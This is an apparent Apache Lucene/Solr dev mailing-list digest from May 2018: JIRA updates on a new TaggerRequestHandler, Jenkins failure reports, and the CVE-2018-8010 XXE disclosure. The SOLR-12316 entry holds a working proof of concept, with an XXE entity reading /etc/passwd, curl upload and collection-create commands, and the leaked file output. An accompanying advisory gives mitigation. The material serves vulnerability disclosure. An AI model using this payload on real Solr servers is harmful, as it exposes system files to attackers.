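This is why the fix has to happen at the XML-parser configuration level: by the time application code sees the parsed config, the substitution has already occurred.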

[jira] [Commented] (SOLR-12376) New TaggerRequestHandler (aka SolrTextTagger)

2018-05-21 Thread David Smiley (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12376?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482529#comment-16482529
 ] 

David Smiley commented on SOLR-12376:
-

Patch:
* Copied into new package org.apache.solr.handler.tagger
* The source headers are retained from OpenSextant.  NOTICE.txt updated with 
legal mumbo-jumbo.  BTW IntelliJ annoyingly replaced the headers with the ASF 
one when I copied the files between projects (!) so I manually updated each 
one.  It didn't seem to honor the copyright feature settings to not update 
existing copyrights, at least not in this scenario.  Ugh.
* Removed the htmlOffsetAdjust option and its supporting class & test.  I altered 
TaggerRequestHandler accordingly but left sub-class extension points so that 
the feature could be re-added externally (though the change for this is a little 
clumsy).  I don't want to add additional dependencies (Jericho HTML Parser, 
ASLv2 licensed), _at least not at this time_.  And in retrospect I've wondered 
if the underlying feature here could be accomplished in a better way.
** Note that the xmlOffsetAdjust expressly depends on Woodstox, which is 
already included with Solr.
* Removed @author tags
* Copied the test config into test collection1 as solrconfig-tagger.xml and 
schema-tagger.xml
** Replaced the OpenSextant fully qualified package name of the handler with 
"solr.TaggerRequestHandler".
*** modified SolrResourceLoader.packages to include "handler.tagger." due to 
the sub-package
** Replaced the OpenSextant package name of the ConcatenateFilter to 
"solr.ConcatenateFilter" which now works.  (we depend on LUCENE-8323)
** Merged the TaggingAttribute test config into this config since it was easy 
to do and avoids bloating with yet another config
* Removed legacy support of configuration which allowed top level settings in 
the request handler as implied invariants.

TODO docs

> New TaggerRequestHandler (aka SolrTextTagger)
> -
>
> Key: SOLR-12376
> URL: https://issues.apache.org/jira/browse/SOLR-12376
> Project: Solr
>  Issue Type: New Feature
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: David Smiley
>Assignee: David Smiley
>Priority: Major
> Fix For: 7.4
>
> Attachments: SOLR-12376.patch
>
>
> This issue introduces a new RequestHandler: {{TaggerRequestHandler}}, AKA the 
> SolrTextTagger from the OpenSextant project 
> [https://github.com/OpenSextant/SolrTextTagger]. It's used for named entity 
> recognition (NER) of text passed to it. It doesn't do any NLP (outside of 
> Lucene text analysis) so it's said to be a "naive tagger", but it's 
> definitely useful as-is and a more complete NER or ERD (entity recognition 
> and disambiguation) system can be built with this as a key component. The 
> SolrTextTagger has been used on queries for query understanding, on full 
> text, and with dictionaries numbering in the tens of millions of entries. 
> Since it's small and has been used a bunch (including 
> helping win an ERD competition and in [Apache 
> Stanbol|https://stanbol.apache.org/]), several people have asked me when or 
> why isn't this in Solr yet. So here it is.
> To use it, first you need a collection of documents that have a name-like 
> field (short text) indexed with the ConcatenateFilter (LUCENE-8323) at the 
> end. We call this the dictionary. Once that's in place, you simply post text 
> to a {{TaggerRequestHandler}} and it returns the offset pairs into that text 
> for matches in the dictionary along with the uniqueKey of the matching 
> documents. It can also return other document data desired. That's the gist; 
> I'll add more details on use to the Solr Reference Guide.
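The output contract described above — offset pairs into the posted text plus the uniqueKey of each matching dictionary document — can be sketched with a toy pure-Python tagger. This is only an illustration of the result shape (whitespace tokenization, greedy longest match); the real TaggerRequestHandler matches via the Lucene analysis chain and an FST:

```python
def tag(text, dictionary):
    """dictionary: {name: doc_id}; returns [(start, end, doc_id), ...]."""
    words = text.split()
    # Character offsets of each word in the original text.
    offsets, pos = [], 0
    for w in words:
        start = text.index(w, pos)
        offsets.append((start, start + len(w)))
        pos = start + len(w)

    tags, i = [], 0
    while i < len(words):
        # Try the longest phrase starting at word i first.
        for j in range(len(words), i, -1):
            phrase = " ".join(words[i:j])
            if phrase in dictionary:
                tags.append((offsets[i][0], offsets[j - 1][1], dictionary[phrase]))
                i = j
                break
        else:
            i += 1
    return tags

dictionary = {"New York": "doc1", "Boston": "doc2"}
print(tag("flights from Boston to New York", dictionary))
# -> [(13, 19, 'doc2'), (23, 31, 'doc1')]
```

Slicing the input with each returned (start, end) pair recovers exactly the surface form that matched, which is what makes the offsets useful for highlighting or downstream entity linking.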



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (SOLR-12376) New TaggerRequestHandler (aka SolrTextTagger)

2018-05-21 Thread David Smiley (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12376?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

David Smiley updated SOLR-12376:

Attachment: SOLR-12376.patch




[jira] [Updated] (SOLR-12316) CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

2018-05-21 Thread Uwe Schindler (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Uwe Schindler updated SOLR-12316:
-
Component/s: Server
 Schema and Analysis
 config-api


[jira] [Updated] (SOLR-12316) CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

2018-05-21 Thread Uwe Schindler (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Uwe Schindler updated SOLR-12316:
-
Labels: security  (was: )


[jira] [Commented] (SOLR-12316) CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482430#comment-16482430
 ] 

ASF subversion and git services commented on SOLR-12316:


Commit 3940e6a930bbf245b23a728d1917f850c9f6ae3e in lucene-solr's branch 
refs/heads/branch_6_6 from [~thetaphi]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=3940e6a ]

SOLR-12316: Make CVE public

# Conflicts:
#   solr/CHANGES.txt

# Conflicts:
#   solr/CHANGES.txt



[jira] [Commented] (SOLR-12316) CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482428#comment-16482428
 ] 

ASF subversion and git services commented on SOLR-12316:


Commit 6bb88bb2861e2fb512d1da9831afbc29acba7a1b in lucene-solr's branch 
refs/heads/branch_7_3 from [~thetaphi]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=6bb88bb ]

SOLR-12316: Make CVE public

# Conflicts:
#   solr/CHANGES.txt



[jira] [Commented] (SOLR-12316) CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482426#comment-16482426
 ] 

ASF subversion and git services commented on SOLR-12316:


Commit f08c6b1ef149b4a7ca63c68c9fde3ccb14d39e6a in lucene-solr's branch 
refs/heads/branch_7x from [~thetaphi]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=f08c6b1 ]

SOLR-12316: Make CVE public

# Conflicts:
#   solr/CHANGES.txt



[jira] [Commented] (SOLR-12316) CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482425#comment-16482425
 ] 

ASF subversion and git services commented on SOLR-12316:


Commit 63e213916cd99490973c0473d1969bd5dcd7edd8 in lucene-solr's branch 
refs/heads/master from [~thetaphi]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=63e2139 ]

SOLR-12316: Make CVE public


> CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)
> -
>
> Key: SOLR-12316
> URL: https://issues.apache.org/jira/browse/SOLR-12316
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public (Default Security Level. Issues are Public)
>Affects Versions: 5.5.5, 6.6.3, 7.3
>Reporter: Ishan Chattopadhyaya
>Assignee: Uwe Schindler
>Priority: Blocker
> Fix For: 6.6.4, 7.4, master (8.0), 7.3.1
>
> Attachments: SOLR-12316-testfix.patch, SOLR-12316.patch, 
> SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, 
> solr.log
>
>
> While trying to work around the issue of being unable to upload large files 
> to ZK (without jute.maxbuffer setting), [~antz] brought to my notice that he 
> was able to successfully achieve that using XXE. That alarmed me! Our 
> managed-schema and solrconfig.xml parse XXEs!
> Here's a very nasty attack I could execute using this and configset upload 
> functionality:
> Step 1: Create a configset with just two files in a directory called 
> "minimal":
> schema.xml:
> {code}
> <!-- reconstructed: the list archive stripped the XML tags -->
> <schema name="minimal" version="1.1">
>   <fieldType name="string" class="solr.StrField"/>
>   <field name="id" type="string" indexed="true" stored="true"/>
> </schema>
> {code}
> solrconfig.xml:
> {code}
> <!-- reconstructed: the list archive stripped the XML tags; element names
>      follow a stock solrconfig.xml, the entity declaration is the attack -->
> <!DOCTYPE config [
> <!ENTITY passwdFile SYSTEM "file:///etc/passwd">
> ]>
> <config>
>   <dataDir>${solr.data.dir:}</dataDir>
>   <directoryFactory name="DirectoryFactory"
>       class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
>   <schemaFactory class="ClassicIndexSchemaFactory"/>
>   <luceneMatchVersion>7.3.0</luceneMatchVersion>
>   <updateHandler class="solr.DirectUpdateHandler2">
>     <commitWithin>
>       <softCommit>${solr.commitwithin.softcommit:true}</softCommit>
>     </commitWithin>
>   </updateHandler>
>   <requestHandler name="/select" class="solr.SearchHandler">
>     <lst name="defaults">
>       <str name="echoParams">explicit</str>
>       <str name="indent">true</str>
>       <str name="df">text</str>
>       <str name="password">&passwdFile;</str>
>     </lst>
>   </requestHandler>
> </config>
> {code}
> Step 2: Upload the minimal directory to Solr using configset upload API:
> {code}
> [ishan@x260 solr] $ (cd minimal && zip -r - *) | curl -X POST --header 
> "Content-Type:application/octet-stream" --data-binary @- 
> "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=mybadconfigset"
>   adding: schema.xml (deflated 42%)
>   adding: solrconfig.xml (deflated 50%)
> {
>   "responseHeader":{
> "status":0,
> "QTime":23}}
> {code}
> Step 3: Create a collection using this configset
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/admin/collections?action=CREATE&name=mybadcoll&numShards=1&collection.configName=mybadconfigset"
> {
>   "responseHeader":{
> "status":0,
> "QTime":3431},
>   "success":{
> "192.168.1.6:8983_solr":{
>   "responseHeader":{
> "status":0,
> "QTime":2062},
>   "core":"mybadcoll_shard1_replica_n1"}}}
> {code}
> Step 4: Use Config API to check the select handler's config. The file is 
> revealed!
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/mybadcoll/config/requestHandler" | jq
>   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
>                                  Dload  Upload   Total   Spent    Left  Speed
> 100  7939  100  7939    0     0   7939      0  0:00:01 --:--:--  0:00:01  323k
> {
>   "responseHeader": {
> "status": 0,
> "QTime": 16
>   },
>   "config": {
> "requestHandler": {
>   "/select": {
> "name": "/select",
> "class": "solr.SearchHandler",
> "defaults": {
>   "echoParams": "explicit",
>   "indent": "true",
>   "df": "text",
>   "password": 
> "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\nftp:x:14:50:FTP
>  
> User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nsystemd-timesync:x:999:998:systemd
>  Time Synchronization:/:/sbin/nologin\nsystemd-network:x:192:192:systemd 
> Network Management:/:/sbin/nologin\nsystemd-resolve:x:193:193:systemd 
> Resolver:/:/sbin/nologin\ndbus:x:81:81:System message 
> bus:/:/sbin/nologin\npolkitd:x:998:997:User for 
> polkitd:/:/sbin/nologin\ngeoclue:x:997:996:User for 
> geoclue:/var/lib/geoclue:/sbin/nologin\nrtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin\npulse:x:171:171:PulseAudio
>  System Daemon:/var/run/pulse:/sbin/nologin\navahi:x:70:70:Avahi mDNS/DNS-SD 
> Stack:/var/run/avahi-daemon:/sbin/nologin\nchrony:x:996:992::/var/lib/chrony:/sbin/nologin\nrpc:x:32:32:Rpcbind
>  Daem

[SECURITY] CVE-2018-8010: XXE vulnerability due to Apache Solr configset upload

2018-05-21 Thread Uwe Schindler
CVE-2018-8010: XXE vulnerability due to Apache Solr configset upload

Severity: High

Vendor:
The Apache Software Foundation

Versions Affected:
Solr 6.0.0 to 6.6.3
Solr 7.0.0 to 7.3.0

Description:
The details of this vulnerability were reported internally by one of Apache
Solr's committers.
This vulnerability relates to XML external entity expansion (XXE) in Solr
config files (solrconfig.xml, schema.xml, managed-schema). In addition, the
XInclude functionality provided in these config files is affected in a similar
way. The vulnerability can be exploited as XXE using the file/ftp/http
protocols in order to read arbitrary local files from the Solr server or the
internal network. See [1] for more details.

Mitigation:
Users are advised to upgrade to either the Solr 6.6.4 or Solr 7.3.1 release,
both of which address the vulnerability. Once the upgrade is complete, no
other steps are required. Those releases only allow external entities and
XIncludes that refer to local files / ZooKeeper resources below the Solr
instance directory (using Solr's ResourceLoader); usage of absolute URLs is
denied. Keep in mind that external entities and XInclude are explicitly
supported to better structure config files in large installations. Before
Solr 6 this was not a problem, as config files were not accessible through
the APIs.

If users are unable to upgrade to Solr 6.6.4 or Solr 7.3.1, they are advised
to make sure that Solr instances are only used locally, without access to the
public internet, so the vulnerability cannot be exploited. In addition,
reverse proxies should be configured so that end users cannot reach the
configset APIs. Please refer to [2] for how to correctly secure Solr servers.

Solr 5.x and earlier are not affected by this vulnerability; those versions do
not allow uploading configsets via the API. Nevertheless, users should upgrade
those versions as soon as possible, because there may be other ways to inject
config files through the file upload functionality of the old web interface.
Those versions are no longer maintained, so no deep analysis was done.

Credit:
Ananthesh, Ishan Chattopadhyaya

References:
[1] https://issues.apache.org/jira/browse/SOLR-12316
[2] https://wiki.apache.org/solr/SolrSecurity

-
Uwe Schindler
uschind...@apache.org 
ASF Member, Apache Lucene PMC / Committer
Bremen, Germany
http://lucene.apache.org/



-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[JENKINS] Lucene-Solr-repro - Build # 672 - Still Unstable

2018-05-21 Thread Apache Jenkins Server
Build: https://builds.apache.org/job/Lucene-Solr-repro/672/

[...truncated 28 lines...]
[repro] Jenkins log URL: 
https://builds.apache.org/job/Lucene-Solr-BadApples-Tests-master/60/consoleText

[repro] Revision: f506bc9cb7f1e82295c9c367487d49a80e767731

[repro] Repro line:  ant test  -Dtestcase=TestLargeCluster 
-Dtests.method=testSearchRate -Dtests.seed=9B07576659325420 
-Dtests.multiplier=2 -Dtests.slow=true -Dtests.badapples=true -Dtests.locale=hi 
-Dtests.timezone=Africa/Harare -Dtests.asserts=true -Dtests.file.encoding=UTF-8

[repro] Repro line:  ant test  -Dtestcase=TestLargeCluster 
-Dtests.method=testNodeLost -Dtests.seed=9B07576659325420 -Dtests.multiplier=2 
-Dtests.slow=true -Dtests.badapples=true -Dtests.locale=hi 
-Dtests.timezone=Africa/Harare -Dtests.asserts=true -Dtests.file.encoding=UTF-8

[repro] Repro line:  ant test  -Dtestcase=SearchRateTriggerIntegrationTest 
-Dtests.method=testDeleteNode -Dtests.seed=9B07576659325420 
-Dtests.multiplier=2 -Dtests.slow=true -Dtests.badapples=true 
-Dtests.locale=es-MX -Dtests.timezone=Australia/Perth -Dtests.asserts=true 
-Dtests.file.encoding=UTF-8

[repro] Repro line:  ant test  -Dtestcase=TestAuthenticationFramework 
-Dtests.method=testBasics -Dtests.seed=9B07576659325420 -Dtests.multiplier=2 
-Dtests.slow=true -Dtests.badapples=true -Dtests.locale=is -Dtests.timezone=ROK 
-Dtests.asserts=true -Dtests.file.encoding=UTF-8

[repro] Repro line:  ant test  -Dtestcase=IndexSizeTriggerTest 
-Dtests.method=testTrigger -Dtests.seed=9B07576659325420 -Dtests.multiplier=2 
-Dtests.slow=true -Dtests.badapples=true -Dtests.locale=sr-Latn-ME 
-Dtests.timezone=Asia/Pontianak -Dtests.asserts=true -Dtests.file.encoding=UTF-8

[repro] git rev-parse --abbrev-ref HEAD
[repro] git rev-parse HEAD
[repro] Initial local git branch/revision: 
93926e9c83a9b4e9d52182654befae9d56191911
[repro] git fetch

[...truncated 2 lines...]
[repro] git checkout f506bc9cb7f1e82295c9c367487d49a80e767731

[...truncated 2 lines...]
[repro] git merge --ff-only

[...truncated 1 lines...]
[repro] ant clean

[...truncated 6 lines...]
[repro] Test suites by module:
[repro]solr/core
[repro]   IndexSizeTriggerTest
[repro]   TestLargeCluster
[repro]   TestAuthenticationFramework
[repro]   SearchRateTriggerIntegrationTest
[repro] ant compile-test

[...truncated 3298 lines...]
[repro] ant test-nocompile -Dtests.dups=5 -Dtests.maxfailures=20 
-Dtests.class="*.IndexSizeTriggerTest|*.TestLargeCluster|*.TestAuthenticationFramework|*.SearchRateTriggerIntegrationTest"
 -Dtests.showOutput=onerror  -Dtests.seed=9B07576659325420 -Dtests.multiplier=2 
-Dtests.slow=true -Dtests.badapples=true -Dtests.locale=sr-Latn-ME 
-Dtests.timezone=Asia/Pontianak -Dtests.asserts=true -Dtests.file.encoding=UTF-8

[...truncated 18056 lines...]
[repro] Setting last failure code to 256

[repro] Failures:
[repro]   0/5 failed: org.apache.solr.cloud.TestAuthenticationFramework
[repro]   0/5 failed: org.apache.solr.cloud.autoscaling.sim.TestLargeCluster
[repro]   2/5 failed: org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest
[repro]   3/5 failed: 
org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest
[repro] git checkout 93926e9c83a9b4e9d52182654befae9d56191911

[...truncated 2 lines...]
[repro] Exiting with code 256

[...truncated 5 lines...]


[jira] [Updated] (SOLR-12316) CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

2018-05-21 Thread Uwe Schindler (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Uwe Schindler updated SOLR-12316:
-
Security: Public  (was: Private (Security Issue))

> CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)
> -
>
> Key: SOLR-12316
> URL: https://issues.apache.org/jira/browse/SOLR-12316
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public (Default Security Level. Issues are Public)
>Affects Versions: 5.5.5, 6.6.3, 7.3
>Reporter: Ishan Chattopadhyaya
>Assignee: Uwe Schindler
>Priority: Blocker
> Fix For: 6.6.4, 7.4, master (8.0), 7.3.1
>
> Attachments: SOLR-12316-testfix.patch, SOLR-12316.patch, 
> SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, 
> solr.log
>

[jira] [Updated] (SOLR-11774) langid.map.individual won't work with langid.map.keepOrig

2018-05-21 Thread Uwe Schindler (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-11774?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Uwe Schindler updated SOLR-11774:
-
Fix Version/s: (was: 6.6.4)

> langid.map.individual won't work with langid.map.keepOrig
> -
>
> Key: SOLR-11774
> URL: https://issues.apache.org/jira/browse/SOLR-11774
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public (Default Security Level. Issues are Public)
>  Components: contrib - LangId
>Affects Versions: 5.0
>Reporter: Marco Remy
>Assignee: Jan Høydahl
>Priority: Minor
> Fix For: 7.4, master (8.0)
>
>  Time Spent: 10m
>  Remaining Estimate: 0h
>
> I tried to get language detection to work.
> *Setting:*
> {code:xml}
> <!-- reconstructed: the list archive stripped the tags; param names follow
>      the langid docs, the name carrying the "txt" value did not survive -->
> <processor class="org.apache.solr.update.processor.LangDetectLanguageIdentifierUpdateProcessorFactory">
>   <str name="langid.fl">title,author</str>
>   <str name="langid.langField">detected_languages</str>
>   <str name="langid.whitelist">de,en</str>
>   <str name="...">txt</str>
>   <str name="langid.map">true</str>
>   <str name="langid.map.individual">true</str>
>   <str name="langid.map.keepOrig">true</str>
> </processor>
> 
> {code}
> Main purpose:
> * Map fields individually
> * Keep the original field
> But the fields won't be mapped individually; they are all mapped to a single 
> detected language. After some hours of investigation I finally found the 
> reason: *The option langid.map.keepOrig breaks the individual mapping 
> function.* Only when it is disabled are the fields mapped as expected.
> - Regards



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)




[More Like This] I would like to contribute

2018-05-21 Thread Alessandro Benedetti
Hi gents,
I have spent some time over the last year or so working on the Lucene More
Like This (and the related Solr components).

Initially I just wanted to improve it by adding BM25 [1], but then I noticed
a lot of areas for possible improvement.

I then started a refactor of the functionality with these objectives in mind:

1) make the MLT more readable
2) make the MLT more modular and easier to extend
3) make the MLT better tested

*This is just a start, I want to invest significant time with my company to
work on the functionality and contribute it back.*

I split my effort into small Pull Requests to make review and possible
contribution easy.

Unfortunately I didn't get much feedback so far.
The More Like This functionality seems mostly abandoned.
I also tried to contact one of the last committers apparently involved in its
development (Mark Harwood, mharw...@apache.org), but had no luck.

This is the current Jira issue, which starts with a first small refactor +
tests:

https://issues.apache.org/jira/browse/SOLR-12299

I would love to contribute this and much more, but I need some feedback and
review (unfortunately I am not a committer yet).

Let me know what I can do to speed up the process from my side.

Regards

[1] https://issues.apache.org/jira/browse/LUCENE-7498

--
Alessandro Benedetti
Search Consultant, R&D Software Engineer, Director
www.sease.io


[JENKINS] Lucene-Solr-7.x-Windows (64bit/jdk-10.0.1) - Build # 604 - Still Unstable!

2018-05-21 Thread Policeman Jenkins Server
Build: https://jenkins.thetaphi.de/job/Lucene-Solr-7.x-Windows/604/
Java: 64bit/jdk-10.0.1 -XX:-UseCompressedOops -XX:+UseG1GC

2 tests failed.
FAILED:  org.apache.solr.common.util.TestTimeSource.testEpochTime

Error Message:
SimTimeSource:50.0 time diff=10315000

Stack Trace:
java.lang.AssertionError: SimTimeSource:50.0 time diff=10315000
at 
__randomizedtesting.SeedInfo.seed([9D147D2F8E182684:A5780E0A1AC884C2]:0)
at org.junit.Assert.fail(Assert.java:93)
at org.junit.Assert.assertTrue(Assert.java:43)
at 
org.apache.solr.common.util.TestTimeSource.doTestEpochTime(TestTimeSource.java:48)
at 
org.apache.solr.common.util.TestTimeSource.testEpochTime(TestTimeSource.java:32)
at 
java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:564)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleIgnoreTestSuites$1.evaluate(TestRuleIgnoreTestSuites.java:54)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at java.base/java.lang.Thread.run(Thread.java:844)


FAILED:  org.apache.solr.common.util.TestTimeSource.testEpochTime

Error Message:
NanoTimeSource time diff=368900

Stack Trace:
java.lang.AssertionError: NanoTimeSource time diff=368900
at 
__randomizedtesting.SeedInfo.see

RE: [JENKINS] Lucene-Solr-master-MacOSX (64bit/jdk1.8.0) - Build # 4647 - Failure!

2018-05-21 Thread Uwe Schindler
Should be fixed now. Sorry for the noise.

-
Uwe Schindler
Achterdiek 19, D-28357 Bremen
http://www.thetaphi.de
eMail: u...@thetaphi.de

> -Original Message-
> From: Policeman Jenkins Server 
> Sent: Monday, May 21, 2018 4:56 AM
> To: sar...@apache.org; dev@lucene.apache.org
> Subject: [JENKINS] Lucene-Solr-master-MacOSX (64bit/jdk1.8.0) - Build # 4647
> - Failure!
> 
> Build: https://jenkins.thetaphi.de/job/Lucene-Solr-master-MacOSX/4647/
> Java: 64bit/jdk1.8.0 -XX:-UseCompressedOops -XX:+UseG1GC
> 
> No tests ran.
> 
> Build Log:
> [...truncated 30 lines...]
> ERROR: Step ‘Publish JUnit test result report’ failed: No test report files 
> were
> found. Configuration error?
> Email was triggered for: Failure - Any
> Sending email for trigger: Failure - Any
> Setting
> ANT_1_8_2_HOME=/Users/jenkins/tools/hudson.tasks.Ant_AntInstallation/
> ANT_1.8.2
> Setting
> ANT_1_8_2_HOME=/Users/jenkins/tools/hudson.tasks.Ant_AntInstallation/
> ANT_1.8.2
> Setting
> ANT_1_8_2_HOME=/Users/jenkins/tools/hudson.tasks.Ant_AntInstallation/
> ANT_1.8.2
> Setting
> ANT_1_8_2_HOME=/Users/jenkins/tools/hudson.tasks.Ant_AntInstallation/
> ANT_1.8.2





[JENKINS] Lucene-Solr-repro - Build # 671 - Unstable

2018-05-21 Thread Apache Jenkins Server
Build: https://builds.apache.org/job/Lucene-Solr-repro/671/

[...truncated 28 lines...]
[repro] Jenkins log URL: 
https://builds.apache.org/job/Lucene-Solr-BadApples-Tests-7.x/63/consoleText

[repro] Revision: 1e661ed97aed0cc77869b01134d80c761c6b5295

[repro] Repro line:  ant test  -Dtestcase=ScheduledMaintenanceTriggerTest 
-Dtests.method=testInactiveShardCleanup -Dtests.seed=63B30E99B809974F 
-Dtests.multiplier=2 -Dtests.slow=true -Dtests.badapples=true -Dtests.locale=it 
